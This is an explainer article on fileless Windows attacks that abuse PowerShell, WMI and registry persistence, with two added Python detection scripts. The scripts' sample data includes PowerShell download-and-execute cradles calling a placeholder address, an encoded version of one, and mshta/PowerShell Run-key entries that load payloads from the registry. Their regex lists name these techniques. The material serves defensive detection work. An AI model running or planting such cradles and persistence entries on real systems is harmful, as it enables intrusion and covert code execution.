Non-malware attacks are on the rise, but how do we protect against them? The majority of cyber incidents reported in 2017 were non-malware based, yet many organizations are not even aware that such attacks exist. According to a study by the Ponemon Institute, 77 percent of the attacks that successfully compromised organizations in 2017 were fileless, and the report estimates that fileless attacks are ten times more likely to succeed than file-based attacks. The same report expects fileless techniques to account for 35 percent of all attacks in 2018.
What are non-malware attacks?
Non-malware attacks, also known as fileless attacks, zero-footprint attacks, or macro attacks, are a type of cyber attack in which an attacker uses software that is already present, allowed (remote access) applications, and authorized protocols to carry out malicious activity on your network. They do not require the installation of any software on the victim's machine, and that is how they evade application whitelisting: whitelisting permits only approved applications to run, and these attacks use nothing but approved applications. Hackers have found ways to turn Windows against itself and carry out fileless attacks using built-in Windows tools.
Instead of dropping custom tools that could be flagged as malware, hackers use the tools that already exist on the device, so antivirus products are more likely to miss them. The attacker then takes over a legitimate system process and runs malicious code in its memory space.
How do non-malware attacks usually happen?
- A user opens a malicious email attachment or visits a compromised or malicious site
- An exploit kit scans the computer for vulnerabilities and uses one of them to run malicious code through a built-in Windows system administration tool
- The fileless payload is loaded into the memory of a legitimate Windows process (for example through a DLL that process already uses) and the attack proceeds from there, hidden inside a trusted process
What are the characteristics of fileless malware?
- Has no file on disk and therefore no identifiable code or signature that file-based scanners can match. Because there is nothing to hash or scan, signature-based tools cannot detect it; detection has to rely on behaviour and memory inspection instead.
- Lives in the computer's RAM, hence the name memory-based malware
- Uses processes that are native to the operating system you are using to carry out the attack
- May be paired with other types of malware
- May circumvent application whitelisting, a control that allows only approved applications to run on a machine, because fileless malware executes through approved applications that are already on the system
Be sure to watch for unusual network patterns and traces, such as a workstation connecting to known botnet command-and-control servers. Look for signs of compromise in system memory as well as for other artifacts that malicious code may have left behind, such as registry entries used for persistence.
Built-in Windows tools that non-malware attacks typically abuse:
- Windows PowerShell
- Windows Management Instrumentation (WMI)
How do non-malware attacks work?
Fileless malware attacks take default Windows tools, particularly PowerShell and Windows Management Instrumentation (WMI), and use them for malicious activity. Fileless malware leverages applications that are already installed on the user's computer and that are known to be safe. For example, exploit kits can target browser vulnerabilities to make the browser run malicious code, abuse Microsoft Word macros, or invoke Microsoft's PowerShell utility. PowerShell and WMI are the adversary's tools of choice because they are installed on every Windows machine, can execute arbitrary commands, and are part of the daily workflow of many IT professionals, which makes banning them outright impractical.
For example, suppose you click on a banner ad without knowing that it is a malicious advertisement. You are redirected to a malicious site that loads a Flash object. The Flash exploit launches Windows PowerShell with a command-line script that runs entirely in memory. PowerShell then downloads and executes further malicious code from a botnet or other compromised server, code that looks for data to send back to the attackers.
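The download-and-execute pattern described above never touches disk, but it does leave one reliable trace: the PowerShell command line recorded at process creation. The block below is an added example, not code from the original article. It runs simple triage logic over constructed command lines of the kind Sysmon Event ID 1 or Windows Security event 4688 records, decodes anything passed through -EncodedCommand, and scores indicator hits; the indicator names, regular expressions, sample command lines and the two-indicator threshold are this example's own assumptions rather than a published rule set.

```python
"""Score process-creation command lines for fileless PowerShell tradecraft.

Added example, not code from the original article. The sample command lines
are constructed to look like what Sysmon Event ID 1 or Security 4688 records;
the indicator names, regexes and the two-indicator threshold are assumptions
of this example, not a published rule set.
"""
import base64
import re

# Assumed indicator patterns, applied to the raw command line plus anything
# recovered from -EncodedCommand. Each alone is common in admin scripts; the
# combination (hidden window + no profile + download + IEX) is the cradle shape.
INDICATORS = {
    "download_cradle": re.compile(
        r"Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|\bcurl\b", re.I),
    "invoke_expression": re.compile(r"\bIEX\b|Invoke-Expression", re.I),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+(?:hidden|1)\b", re.I),
    "no_profile": re.compile(r"-nop(?:rofile)?\b", re.I),
    "bypass_policy": re.compile(r"-e(?:p|xec(?:utionpolicy)?)\s+bypass", re.I),
    "inline_base64": re.compile(r"FromBase64String", re.I),
    "reflective_load": re.compile(r"\[Reflection\.Assembly\]::Load|Add-Type\b", re.I),
}

# -e, -ec, -enc, -encodedcommand followed by a base64 blob. PowerShell accepts
# any unambiguous prefix of the parameter name; these are the common spellings.
ENC_FLAG = re.compile(r"-e(?:c|nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(cmdline):
    """Return the UTF-16LE script hidden behind -EncodedCommand, or None."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(cmdline):
    """Return indicator hits for one command line, decoded payload included."""
    decoded = decode_encoded_command(cmdline)
    haystack = cmdline if decoded is None else cmdline + "\n" + decoded
    hits = {name for name, rx in INDICATORS.items() if rx.search(haystack)}
    if decoded is not None:
        hits.add("encoded_command")
    return {
        "cmdline": cmdline,
        "decoded": decoded,
        "hits": sorted(hits),
        # Assumed threshold: a single indicator is routine in admin tooling.
        "suspicious": len(hits) >= 2,
    }


def triage(cmdlines):
    """Return only the command lines that cross the threshold, most hits first."""
    results = [analyze(c) for c in cmdlines]
    return sorted((r for r in results if r["suspicious"]),
                  key=lambda r: len(r["hits"]), reverse=True)


# Constructed sample events (not real telemetry). 203.0.113.10 is a
# documentation address, and the encoded payload is built right here.
_SCRIPT = "$w=New-Object Net.WebClient;IEX $w.DownloadString('http://203.0.113.10/s')"
SAMPLE_ENCODED = base64.b64encode(_SCRIPT.encode("utf-16-le")).decode("ascii")

SAMPLE_CMDLINES = [
    'powershell.exe -NoProfile -Command "Get-Service | Where-Object Status -eq Running"',
    'powershell.exe -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString(\'http://203.0.113.10/p.ps1\')"',
    f"powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Enc {SAMPLE_ENCODED}",
    "powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\backup.ps1",
]

if __name__ == "__main__":
    for r in triage(SAMPLE_CMDLINES):
        print(r["hits"], "<-", r["cmdline"][:60])
        if r["decoded"]:
            print("   decoded:", r["decoded"])
```

Run as-is, the two admin-looking command lines (a profile-less Get-Service call and a scheduled script run with an execution-policy bypass) each trip one indicator and are left alone, while the plain and the encoded download cradles are reported with the decoded script attached. In production the same logic would be fed from PowerShell script block logging (event 4104) as well, since the -Command body is what matters, not the launcher.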
Common types of non-malware attacks:
Fileless persistence methods – the malicious code survives a reboot without ever being written to disk as a file. For example, a malicious script may be stored in a Windows registry value and launched again by an autostart entry after each reboot
Memory-only threats – the attack exploits a vulnerability and executes its payload entirely in memory
Dual-use tools – existing Windows system tools are used for malicious purposes
Non-Portable Executable (PE) file attacks – a type of dual-use tool attack that uses legitimate Windows tools and applications together with scripts run by interpreters such as PowerShell, CScript or WScript
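Registry-resident persistence of the kind described under "Fileless persistence methods" is found by reviewing autostart entries rather than files. The block below is an added example and not code from the original article: it assesses constructed HKCU/HKLM Run values (the entry names, commands, heuristics and the 400-character threshold are this example's assumptions) and flags entries that launch a script host with an inline script, read their payload back out of another registry value, or hide behind an unprintable value name.

```python
"""Find registry-resident (fileless) persistence in autostart entries.

Added example, not code from the original article. The registry entries below
are constructed in the shape of HKCU/HKLM ...\\Run values; the heuristics
(script hosts, inline-script markers, registry read-back markers, a length
threshold, control characters in value names) are this example's assumptions,
a triage starting point rather than a complete rule set.
"""
import re

# Interpreters and proxies that can run a script with no file of their own.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "wscript.exe",
                "cscript.exe", "rundll32.exe", "regsvr32.exe", "cmd.exe"}

# Assumed markers, only evaluated when the launcher is a script host.
MARKERS = {
    "inline_script": re.compile(
        r"javascript:|vbscript:|RunHTMLApplication|\bIEX\b|Invoke-Expression", re.I),
    "encoded_command": re.compile(r"-e(?:c|nc(?:odedcommand)?)?\s+[A-Za-z0-9+/=]{16,}", re.I),
    # The payload lives in another registry value and is read back at start-up.
    "registry_readback": re.compile(
        r"HK(?:CU|LM|EY_[A-Z_]+)[:\\]|Get-ItemProperty|\bgp\b|RegRead", re.I),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+(?:hidden|1)\b", re.I),
}
LONG_VALUE = 400  # assumed: a normal Run value is a path plus a flag or two


def launcher(data):
    """Lower-case basename of the executable a Run value starts ('' if none).

    A bare name without extension is assumed to be an .exe, which is how the
    shell resolves 'mshta' or 'powershell' from a Run value.
    """
    m = re.match(r'\s*(?:"([^"]+)"|(\S+))', data)
    if not m:
        return ""
    exe = (m.group(1) or m.group(2)).replace("/", "\\").split("\\")[-1].lower()
    return exe if exe.endswith(".exe") else exe + ".exe"


def assess(entry):
    """Return the reasons an autostart entry looks like fileless persistence."""
    key, name, data = entry
    reasons = []
    exe = launcher(data)
    if exe in SCRIPT_HOSTS:
        reasons.append("script_host:" + exe)
        reasons += [m for m, rx in MARKERS.items() if rx.search(data)]
    if len(data) > LONG_VALUE:
        reasons.append("oversized_value")
    # An unprintable character in the value name keeps it from showing up in
    # regedit; assumes the export preserved the raw name.
    if any(ord(ch) < 32 for ch in name):
        reasons.append("control_char_in_name")
    # Assumed verdict: a script host alone (e.g. a logon .vbs) is a weak
    # signal; a script host plus any marker, or a hidden/oversized value, is not.
    suspicious = ("control_char_in_name" in reasons or "oversized_value" in reasons
                  or (exe in SCRIPT_HOSTS and len(reasons) >= 2))
    return {"key": key, "name": name, "launcher": exe,
            "reasons": reasons, "suspicious": suspicious}


def triage(entries):
    """Return only the suspicious entries, in the order they were listed."""
    return [r for r in (assess(e) for e in entries) if r["suspicious"]]


# Constructed sample entries (key, value name, value data); not from a real host.
RUN = r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run"
_STAGE = ("powershell.exe -w hidden -c \"$a='" + "A" * 600
          + "';IEX ([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($a)))\"")
SAMPLE_ENTRIES = [
    (RUN, "OneDrive",
     r'"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'),
    (RUN, "Updater",
     r'powershell.exe -nop -w hidden -c "IEX (gp HKCU:\Software\Classes\Cfg).Blob"'),
    (RUN, "\x00hidden",
     "mshta \"javascript:var s=new ActiveXObject('WScript.Shell');"
     "eval(s.RegRead('HKCU\\\\Software\\\\Classes\\\\Cfg\\\\Data'))\""),
    (RUN, "Logon", r"wscript.exe //B C:\Scripts\mapdrives.vbs"),
    (RUN, "Stage", _STAGE),
]

if __name__ == "__main__":
    for r in triage(SAMPLE_ENTRIES):
        print(repr(r["name"]), r["launcher"], r["reasons"])
```

The ordinary OneDrive entry and the logon .vbs are reported clean (the latter only carries the weak script-host signal), while the three entries that keep their script in the registry or in the value itself are flagged with the specific reason, which is what an analyst needs to decide what to pull next.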
Best practices for fileless malware protection
Navigating the changing threat landscape and tackling sophisticated fileless malware can be daunting for many organizations. However, there are a few things you can do to protect yourself against these invisible threats and to detect the techniques they rely on.
- Restrict management frameworks such as PowerShell and WMI to the users and hosts that actually need them
- Disable Office macros, or at least block macros in documents that came from the Internet
- Monitor for unauthorized network traffic
- Make sure end users know how to connect safely, and provide training
- Use next-generation endpoint security solutions that inspect behaviour and memory, not just files
- Keep software current and patches up to date
Fileless malware points to the direction in which cyber threats are heading. The sophistication of these non-malware attacks indicates that many businesses are unprepared to handle the risk. Fileless attacks continue to rise because anti-malware solutions have difficulty detecting them, and these memory-based attacks are ten times more likely to succeed than file-based malware. Organizations should create a strategy that includes both endpoint security solutions and employee training to combat these threats.